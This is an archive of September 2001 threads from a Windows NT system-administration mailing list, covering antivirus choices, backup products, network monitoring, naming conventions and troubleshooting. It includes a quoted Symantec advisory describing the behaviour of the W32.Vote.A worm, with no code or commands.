RE: InoculateIT opinions
I could swear Roger of Peregrine did an analysis of what was out there. Care to share? Sophos, for example, doesn't get much ink either.

-----Original Message-----
From: Steve Frenzl [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 11:51 AM
To: NT System Admin Issues
Subject: InoculateIT opinions

My company is looking for a workgroup AV and I was curious what the opinions were of Inoculate. From past threads, the consensus seems to be that Norton is better than McAfee but I don't remember seeing Inoculate discussed. Any input is appreciated.

Steve Frenzl
Systems Administrator
Farmer Automotive Group

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Network Traffic
Our host, Sunbelt, has Netboy. suck up points?

-----Original Message-----
From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 1:57 PM
To: NT System Admin Issues
Subject: RE: Network Traffic

Well, my boss doesn't mind spending the cash (unless we're talking about 20K or more, then it's paperwork HELL!) as long as I can prove the tool has some worth. He is big into monitoring :)

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 4:52 PM
To: NT System Admin Issues
Subject: RE: Network Traffic

If you're willing to spend the $$$ take a look at Packeteer PacketShaper

-----Original Message-----
From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 1:50 PM
To: NT System Admin Issues
Subject: Network Traffic

Heyas!

Can anyone suggest a good tool for network traffic monitoring? We have all HP Procurve Switches and use TopTools, but it doesn't seem that good (unless I'm just missing some config options). For example we wanted to track down a user that was pegging our T @ 97% utilization (he had 15 family guy downloads on morpheus at the same time) and TT did not tell us much. We finally tracked him down by using firewall logs...kind of time consuming

Any good ideas

Cheers

Carlos Garcia-Moran
Senior Network Engineer
Athenahealth, INC
781.392.0157 Main
617.543.1701 Cell
[EMAIL PROTECTED]
RE: Backup - recommendation please?
Unless I got my demos crossed, I thought it could handle open files. You should be able to retrieve a deleted e-mail immediately if I'm not mistaken (I know, bad example)

-----Original Message-----
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:18 PM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?

Doesn't Live Vault back up the file only after it is closed? It appears as if some files never get closed. But Live Vault is a solid choice.

Greg

-----Original Message-----
From: Dempster, Mark [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 12:30 PM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?

Thanks, Mark (and everyone else that replied). I'll look into that.

Mark

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 02:47
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?

Yes, LiveVault is what you are looking for. Real time backup.

http://vs46311.server-store.com/store/page.inetstore?id=3

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: September 28, 2001 9:04 AM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?

Seems to me something like livevault (I think that was it) would work.

-----Original Message-----
From: Dempster, Mark [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:03 AM
To: NT System Admin Issues
Subject: Backup - recommendation please?

Hi,

I'm looking for a backup solution for a new customer. We normally use unenhanced versions of Backup Exec or Arcserve, and back the system up out of hours. Unfortunately this customer needs to work 24/7.

The software my company produces uses a well-known accounting package at its core, which stores its data in a very large number of files which are related to each other. It isn't possible to use a normal 'backup open files' approach since if two related files are backed up - but new data has been added in-between - restoring them will leave the system in an inconsistent state.

So, I think what's needed (if such a thing exists) is a product that will take a snapshot of an entire directory (inc. subdirs) and back that up - while leaving the system usable (a moderate slowdown is acceptable).

Does anyone know if there's an add-on for our normal backup tools (or even a completely different product) that can do what I'm asking? If so, what's your experience of it?

Thanks,
Mark

Mark Dempster
Technical Consultant
Infor:Swan Business Solutions
Me transmitte sursum, Caledoni!

This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service.
RE: InoculateIT opinions
As a Panda user, I can only ask 'why?'

-----Original Message-----
From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:46 PM
To: NT System Admin Issues
Subject: RE: InoculateIT opinions

And yet Boeing chose Panda for their huge deployment.

-----Original Message-----
From: David Hekimian [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:46 PM
To: NT System Admin Issues
Subject: Re: InoculateIT opinions

Steve,

Seriously take a look at TrendMicro's virus scan offering - OfficeScan Corporate Edition. I've used Symantec's Norton Antivirus, CA's InoculateIT, McAfee's VirusScan and countless others. TrendMicro does workgroup AV right! From a centralized management console (web based) to deploy to new users, set policies on the local client (set whether the user can disable OfficeScan or not, etc.), and automatic updates of virus definitions and deployment to desktops.

Also, look at TrendMicro's NeatSuite. It's a combination of OfficeScan, ScanMail and InterScan Viruswall for about the same price as just 1 of the products.

- David

----- Original Message -----
From: Steve Frenzl [EMAIL PROTECTED]
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Friday, September 28, 2001 11:50 AM
Subject: InoculateIT opinions

My company is looking for a workgroup AV and I was curious what the opinions were of Inoculate. From past threads, the consensus seems to be that Norton is better than McAfee but I don't remember seeing Inoculate discussed. Any input is appreciated.

Steve Frenzl
Systems Administrator
Farmer Automotive Group
RE: Files keep disappearing from the winnt dir
Find an undelete program and see if they show up.

-----Original Message-----
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 4:33 PM
To: NT System Admin Issues
Subject: RE: Files keep disappearing from the winnt dir

Gremlins are doing it. We used to occasionally lose WINS entries every once in a while and no one could connect to the server. That was with NT 4.0. With 2000, I haven't had any issues like that.

Greg

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 3:10 PM
To: NT System Admin Issues
Subject: RE: Files keep disappearing from the winnt dir

Nothing in the event logs. I think I will turn on auditing. Today the files were gone in a matter of 1 hour after I copied them in the directory.

John

-----Original Message-----
From: Ian Kelly [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 2:59 PM
To: NT System Admin Issues
Subject: RE: Files keep disappearing from the winnt dir

Anything in the event logs? Is auditing turned on?

Ian
[EMAIL PROTECTED]
To assume makes an ass out of YOU. Leave ME out of this.

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: September 28, 2001 13:40 PM
To: NT System Admin Issues
Subject: RE: Files keep disappearing from the winnt dir

I just ran an AV on the server. No virus.

John

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 1:12 PM
To: NT System Admin Issues
Subject: RE: Files keep disappearing from the winnt dir

AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.

John

-----Original Message-----
From: Brian Steele [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 12:44 PM
To: NT System Admin Issues
Subject: Re: Files keep disappearing from the winnt dir

WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run.

Brian

----- Original Message -----
From: John Cesta - Lists
To: NT System Admin Issues
Sent: Friday, September 28, 2001 11:07 AM
Subject: Files keep disappearing from the winnt dir

I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring.

One day I noticed that the files - not any directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone.

I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more.

Any suggestions?

John Cesta
RE: Exchange/Outlook Alternatives
Aren't there a couple ASP-type companies out there providing this kind of service? I think some are even using Exchange.

-----Original Message-----
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 5:08 PM
To: NT System Admin Issues
Subject: RE: Exchange/Outlook Alternatives

Mark -

We're in the same boat. Regardless of how many times I ask the same question, I get the same answer - nothing compares to Exchange. As servers are cheap in the overall scheme of things - if the company can not afford to do Exchange, I still rely on ISP mail. In between the ISP and the office, I use a software product called Software 602 which handles the pull portion. In addition, I looked at the email from Deerfield but am REALLY pissed at them and will not resell or purchase any of their products anymore.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-----Original Message-----
From: Mark [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 7:56 PM
To: NT System Admin Issues
Subject: Exchange/Outlook Alternatives

I'm constantly asked for recommendations on VIABLE alternatives to the MS Outlook/Exchange groupware system. Let's face it: Exchange is expensive, and does a lot of things that most of my SMB customers will never need. I've seen a few different products, but have yet to find one that integrates and works as well as Outlook with an Exchange server.

Do you guys have any ideas on substitutes? The main core features that most SMB's use would be the scheduling/calendaring, POP/IMAP email, and address book. It'd be nice to have the whole lot integrated, but separate products with a good UI would do. The email and address book clients are easy enough to find, but what about calendaring? Something with the ability to both share an office calendar, and have separate (but viewable) calendars for each worker. Editor privileges for a secretary on specific calendars would be a plus, as well.

To complicate it a bit further, how about something that would work on a peer-to-peer network ( 10 PC's) with no dedicated server?

Any thoughts?
RE: List or BBS
I don't get it. If you don't like the e-mail, then say NO MAIL and read/respond to the postings thru the website. Or get the digest.

-----Original Message-----
From: Chris Shattock [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 1:06 AM
To: NT System Admin Issues
Subject: List or BBS

These lists are a PITA - but not worth giving up. Have you (Sunbelt) or this forums' correspondents considered using a Bulletin Board System - such as that by Infopop - Ultimate BBS.

A couple of years ago in the (Y)UK The Professional Contractors Group (anti-IR35) set their 'forums' up this way - and it ran far better than a list - I believe it's still going - but a lot of others use Ultimate BBS - check from http://www.infopop.com/

I am not a reseller etc. - but it is a real pain dealing with a list when all you can get is a 64K ISDN BRI in some 'third-world' country with a crap telecomm. system and you need that link for remote sysadmin/support/development. A BBS would enable me to use my connection more efficiently - and may ease your (Sunbelt) admin. issues.

Chris Shattock
RE: Intermittent Network logon problem
Never used setprfdc. Does it tell you that it connected to the DC that you think it should connect to? Somebody posted a way to see what DC you're authenticated against.

-----Original Message-----
From: Troy Rambo /278 Systems Specialist [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 6:26 AM
To: NT System Admin Issues
Subject: Intermittent Network logon problem

One of our BDC's (our DNS server) on our NT4 network went down two weeks ago and was unrecoverable, so we had to rebuild it from scratch. Ever since then we have had erratic logon problems throughout our network. Yes we are running DHCP. It's all one subnet and each different building has its own BDC that the users are pointed to using setprfdc to use as their preferred domain controller.

When logging on, my users will occasionally not get their logon script to run even though they are logged into the network. Upon reboot and relogging in, it then maps fine. It's never on the same machine twice, and it's in every corner of our network across three linked buildings across two city blocks. Sometimes it takes turning the machine off for a couple of minutes before rebooting in order for it to connect to the BDC to run their script.

I'm running out of ideas here. Does anyone have any ideas how I can troubleshoot this? I'm going nuts running all over the place, trying to figure this one out.

Your ideas are greatly appreciated.

Thanks
Troy
RE: Workstation Naming Standards
Our servers were named after Little Rascal characters, because before-my-time they had a contest. At least it's easier to explain that Darla does this and Spanky does that. I worked for an integrator that came up with these really cryptic server names based on location/function, and frankly I've yet to see an advantage. It only helped OUR people if we came back, which of course we rarely did. The important thing is you can find the machine for both troubleshooting and inventory.

-----Original Message-----
From: Miley, Dan [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 7:11 AM
To: NT System Admin Issues
Subject: RE: Workstation Naming Standards

3 digit city, 1 digit OS, then machine inventory/asset tag# (this ties it back to the inventory and username.) looks like we may be doing something similar with servers soon.

I don't like the way 2000 automatically names machines domainname-randomalphanumeric. totally useless for finding machines.

I did work at one site where they named their servers after star trek characters. it sounded funny when they said "Spock crashed again", "Can you reboot Spock".

Dan

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 2:06 PM
To: NT System Admin Issues
Subject: RE: Workstation Naming Standards

I use the user name, but I've got a small 50 person installation. I change the name if the person changes. It simplifies figuring out who's having a problem, because I know everyone. Tougher in a large organization.

I sure as heck wouldn't agonize over it. You want to be able to browse a list to pinpoint who's having a problem. And if necessary tie that back to some inventory/allocation information. Serial Number would probably work if you have a good inventory system.

-----Original Message-----
From: David James [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 10:11 AM
To: NT System Admin Issues
Subject: RE: Workstation Naming Standards

I don't use user names. What happens when that employee quits? You have to rename their machine as part of setting up a new user? I would use City_Dept_JobFunction then add a number for multiple job functions.

DJ

-----Original Message-----
From: Osama S. [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 12:05 PM
To: NT System Admin Issues
Subject: Workstation Naming Standards

hi,

we will be deploying Win2K from scratch on the user's machines (around 700) replacing NT 4. SO I was reviewing our machine naming convention. Our Offices are located in two cities, one single domain. So far we would use something like "CityName-Department-User Real Name" (where city name and department are abbreviations) to name workstations. Usually the NT Names are the users Company ID, which is unique.

I was wondering how you guys/girls are naming your workstations and users.

regards
Uso

This e-mail may be privileged and/or confidential, and the sender does not waive any related rights and obligations. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. If you received this e-mail in error, please advise me (by return e-mail or otherwise) immediately.
RE: Another F(*^ virus!
thanks. Still don't see a virus-specific newsletter with alerts like other vendors seem to have. And they were way, way behind in getting the Nimda and Vote defs out the door.

-----Original Message-----
From: Lagerstrom, Lanette [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 4:44 PM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus!

Just FYI --

* VIRUS CENTER
Panda Software and the Windows 2000 Magazine Network have teamed to bring you the Center for Virus Control. Visit the site often to remain informed about the latest threats to your system security.
http://www.secadministrator.com/panda

Lanette Lagerstrom
Northrop Grumman Information Technology
Internal Information Services
Network Administrator

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 6:51 AM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus!

Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know.

-----Original Message-----
From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:03 PM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus!

According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:37 PM
To: NT System Admin Issues
Subject: Another F(*^ virus!

Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Symantec Security Response
http://securityresponse.symantec.com

W32.Vote.A@mm
Discovered on: September 24, 2001
Last Updated on: September 24, 2001 at 09:56:27 AM PDT

W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products.

Type: Worm
Infection Length: 55,808 Bytes
Virus Definitions: September 24, 2001

Threat Assessment:
Wild: Low
Damage: High
Distribution: High

Wild:
Number of infections: 0 - 49
Number of sites: 3 - 9
Geographical distribution: Medium
Threat containment: Moderate
Removal: Moderate

Damage:
Payload:
Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook
Deletes files: After reboot, the worm attempts to delete all files in the Windows folder
Modifies files: All files with the extension "htm" or "html" will be overwritten.
Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer.

Distribution:
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Technical description:
W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace!
Attachment: WTC.EXE

Next, the worm will insert two .vbs files on the system:
\Windows folder\ZaCker.vbs
\Windows\System folder\MixDaLaL.vbs

In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus.

Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus.

What the dropped files do

MixDaLaL.vbs
MixDaLaL.vbs is a Visual Basic Script file that is inserted in the \Windows\System folder. This file is executed by the worm. As the file is executed, it will look through all folders on all fixed drives and network drives for files with the extensions .htm or .html. If such files are found, they are
RE: Testing 1, 2, 3 - Ignore
Exactly my goal in life. Make more money and hire you guys to make it work grin

-----Original Message-----
From: Dave Gushi [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:56 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

This is very funny stuff. It seems the more money some managers make the less they know. I have a VP that thinks the closer he is to the server the better data response he's going to get.

Dave Gushi
God Bless America!

-----Original Message-----
From: Bill Higgins [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 7:50 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

almost as bad as a mangaler (manager) that I had that constantly told people that we had an AtherNet (can you say ethernet) network running Novel (as in book) Server. I didn't have the heart to tell him that we were actually broken ring...

Two more sleeps til Vegas (1) (1) Hi William

-----Original Message-----
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 17:45
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

Did you hear the wind? I had a tech manager years ago that referred to all networks as LAND's and portables as Labtops. Thought the joke would transfer.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:43 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

No, but he may be trying to setup that LAN

-----Original Message-----
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:41 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore

Uh huh, trying to set up that LAND aren't you?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-----Original Message-----
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore

Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell Company Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]

DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error.
RE: ArcServeIT vs. Backup Exec
Don't forget to check out UltraBac too.

-----Original Message-----
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 12:02 PM
To: NT System Admin Issues
Subject: Re: ArcServeIT vs. Backup Exec

Dan,

I have no experience with Veritas but I'm thinking of switching to it. I've been using Arcservit for some time and I have to agree that their support really *stinks*. I'm currently using Arcserveit 2000 and was having a ton of trouble with it. I finally spent 2 hours on the phone being bumped around until someone with a *little* knowledge showed up. Basically, if you install Arcservit 2000 make darn sure you install the latest and greatest patches starting with SP2.

Some of my experiences were:

1. Full backups not happening and the temp directory becoming full.
2. Could not read the status or details of a tape without first using the inventory feature.
3. Very slow to back up Snap Servers.
4. Database getting corrupt.

Since I applied SP2 and all the latest patches everything seems to be fine with the exception of one continuous problem: If I make a modification to a backup schedule then SAVE it then use the little -x- in the top right corner to close it the program freezes and I have to use task manager to kill it. I refuse to call their tech supportless group anymore.

Good luck!

Stephen
RE: Monitoring email
There's tools like ISSCAN that will help find e-mails, but there's no content filtering in Exchange.

-----Original Message-----
From: Neil Harvey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 7:13 AM
To: NT System Admin Issues
Subject: Monitoring email

Does anyone know if exchange 5.5 sp4 has the ability to scan and monitor emails for certain content. If I can help it I don't want to have to buy a third party product.

Neil Harvey
MCP, MCP+I, MCSE, CNA
IT Manager
emw law
DDI: +44 (0)1604 666425
RE: Win2k Cluster and Mac Shares
http://www.thursby.com/products/dave.html

-----Original Message-----
From: Matt Moore [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:36 AM
To: NT System Admin Issues
Subject: Re: Win2k Cluster and Mac Shares

can't remember the mfg. but there is a software named dave that allows macs to browse nt domains like a pc, sort of. it's worked good for me. no special mac crap on the network. just on the local mac.

Matt Moore MCSE, MCP+I, NCSS, HP

----- Original Message -----
From: Joseph [EMAIL PROTECTED]
Newsgroups: ntsysadmin
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Wednesday, September 26, 2001 7:49 AM
Subject: Win2k Cluster and Mac Shares

Any one know if mac shares will work within the cluster? When you create them at the share management level you have the option for the macintosh name, but when you add a file share resource to the cluster you do not get this. Haven't tested it yet. Was hoping to get some feedback first.

Thanks
RE: Backup Slow
Read the logs and compare it to an old log.

-----Original Message-----
From: William Smith [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:26 AM
To: NT System Admin Issues
Subject: RE: Backup Slow

Check under the job-- Advanced tab
Make sure "Verify after backup completes" isn't checked. That would definitely double the time.

W

-----Original Message-----
From: Dominick Romano [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:32 AM
To: NT System Admin Issues
Subject: Backup Slow

Hello, we backup our servers with a Dell DLT 7000 7 Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some strange reason it is taking double the amount of time to backup than it used to. Does anyone have any ideas? Thanks.

Dominick Romano Junior NT Administrator Kravet Fabrics, Inc. Tel: 516-293-2000 Ext: 637 Fax: 516-293-2158 mailto:[EMAIL PROTECTED]
RE: satellite connection
Here's some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html

I thought Verizon had something too.

-----Original Message-----
From: Joe L. Casale [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:20 AM
To: NT System Admin Issues
Subject: RE: satellite connection

msn has one, but they make you buy it through radio shack, and right now, only w/ a new Compaq.

Jlc

Ps. There is a service in NYC as my friend has one, he states it gives about 6mb down! But only 33.6 kb up.

-----Original Message-----
From: Matt Moore [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:41 AM
To: NT System Admin Issues
Subject: satellite connection

anyone have any exp with satellite internet conn. I keep hearing MS has a service but haven't been able to find any info.

Matt Moore
MCSE, MCP+I, NCSS, HP
RE: satellite connection
Oops. Not Verizon, I was thinking of Sprint.

-----Original Message-----
From: Ray Zorz
Sent: Wednesday, September 26, 2001 11:36 AM
To: NT System Admin Issues
Subject: RE: satellite connection

Here's some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html

I thought Verizon had something too.

-----Original Message-----
From: Joe L. Casale [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:20 AM
To: NT System Admin Issues
Subject: RE: satellite connection

msn has one, but they make you buy it through radio shack, and right now, only w/ a new Compaq.

Jlc

Ps. There is a service in NYC as my friend has one, he states it gives about 6mb down! But only 33.6 kb up.

-----Original Message-----
From: Matt Moore [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:41 AM
To: NT System Admin Issues
Subject: satellite connection

anyone have any exp with satellite internet conn. I keep hearing MS has a service but haven't been able to find any info.

Matt Moore
MCSE, MCP+I, NCSS, HP
RE: Create a Registry File
http://www.win2000mag.com/Articles/Index.cfm?ArticleID=20047 may help

-----Original Message-----
From: Khurram Chaudhary [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 2:07 PM
To: NT System Admin Issues
Subject: Create a Registry File

Does anyone know how to create a registry file that will modify certain keys and values?

Khurram Chaudhary Astley-Gilbert Reproductions [EMAIL PROTECTED]

Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mode=0=english
RE: Backup Slow
I do, but I have time, and I'm not 24/7.

-----Original Message-----
From: Keith Johnson [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 12:06 PM
To: NT System Admin Issues
Subject: RE: Backup Slow

Should we not verify???

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 12:04 PM
To: NT System Admin Issues
Subject: RE: Backup Slow

Read the logs and compare it to an old log.

-----Original Message-----
From: William Smith [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:26 AM
To: NT System Admin Issues
Subject: RE: Backup Slow

Check under the job-- Advanced tab
Make sure "Verify after backup completes" isn't checked. That would definitely double the time.

W

-----Original Message-----
From: Dominick Romano [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 11:32 AM
To: NT System Admin Issues
Subject: Backup Slow

Hello, we backup our servers with a Dell DLT 7000 7 Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some strange reason it is taking double the amount of time to backup than it used to. Does anyone have any ideas? Thanks.

Dominick Romano Junior NT Administrator Kravet Fabrics, Inc. Tel: 516-293-2000 Ext: 637 Fax: 516-293-2158 mailto:[EMAIL PROTECTED]
RE: Exchange Store.exe using 95% of CPU
A - Try the Sunbelt Exchange list.
B - What SP of exchange?
C - Are you running exchange maintenance nightly? Try turning it off tonite.

-----Original Message-----
From: Trixie Favato [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 6:54 AM
To: NT System Admin Issues
Subject: Exchange Store.exe using 95% of CPU

Has anyone experienced high CPU utilization from the Store.exe when using Exchange 5.5. I've installed the recommended hotfix that Microsoft put out, ran the optimizer again, re-installed SP6a, but nothing seems to help it. Every morning, I am having to reboot the server because the IS stops responding. If anyone has dealt with this before, please share your resolution.

Thanks,
Trixie Favato Sr. Systems Administrator The Woodbridge Group - Information Technology 4240 Sherwoodtowne Blvd. Mississauga, Ontario Tel. 905.896.3882 Fax. 905-848-1794
RE: Another F(*^ virus! (OT)
I haven't worked with any of the other packages, so I can't compare. It seems to do ok, although they don't have any ALERT system, and always seem to be the last to get a definition out. I still don't know if they have the Vote virus covered. They automatically create a logon script to push the defs to the desktop, so as long as you make sure the server gets updated before everyone logs on it works fine. Our work hours make this a non-issue. Remote users have a problem with the speed.

I do know that I gave up on active desktop scanning. It slowed my workstations down too much. I've been lucky that my folks get a lot of e-mail, but aren't big on downloading files. So I'm scanning Exchange and Outlook. Personally, I think way too many of the virii are being caught at the desktop rather than the Exchange server. They also have no filtering/blocking. As soon as I can free up some money I'll most likely dump the Panda for Exchange and get Sybari.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 6:21 AM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus! (OT)

A little off the topic here, but how do you find Panda? We use Norton AV for desktop and server protection, but have Panda for Lotus Notes protection (I think it's a good idea to have a double layer sometimes). Panda was suggested by our Notes Admin guy, and it has not worked correctly since! Currently it is only running on one of our 4 Notes servers, and I don't think it is doing too well there! I'm about ready to dump it, and have put Norton on the other Notes servers to make sure they are covered. Anyone else out there use Panda, and would actually recommend it?

G.

RZorz@ScottsdaleChamber.com
25/09/2001 13:51
Please respond to NT System Admin Issues
To: NT System Admin Issues [EMAIL PROTECTED]
cc:
Subject: RE: Another F(*^ virus!

Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know.

-----Original Message-----
From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:03 PM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus!

According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:37 PM
To: NT System Admin Issues
Subject: Another F(*^ virus!

Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Symantec Security Response
http://securityresponse.symantec.com

W32.Vote.A@mm
Discovered on: September 24, 2001
Last Updated on: September 24, 2001 at 09:56:27 AM PDT

W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products.

Type: Worm
Infection Length: 55,808 Bytes
Virus Definitions: September 24, 2001

Threat Assessment:
Wild: Low
Damage: High
Distribution: High

Wild:
Number of infections: 0 - 49
Number of sites: 3 - 9
Geographical distribution: Medium
Threat containment: Moderate
Removal: Moderate

Damage:
Payload:
Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook
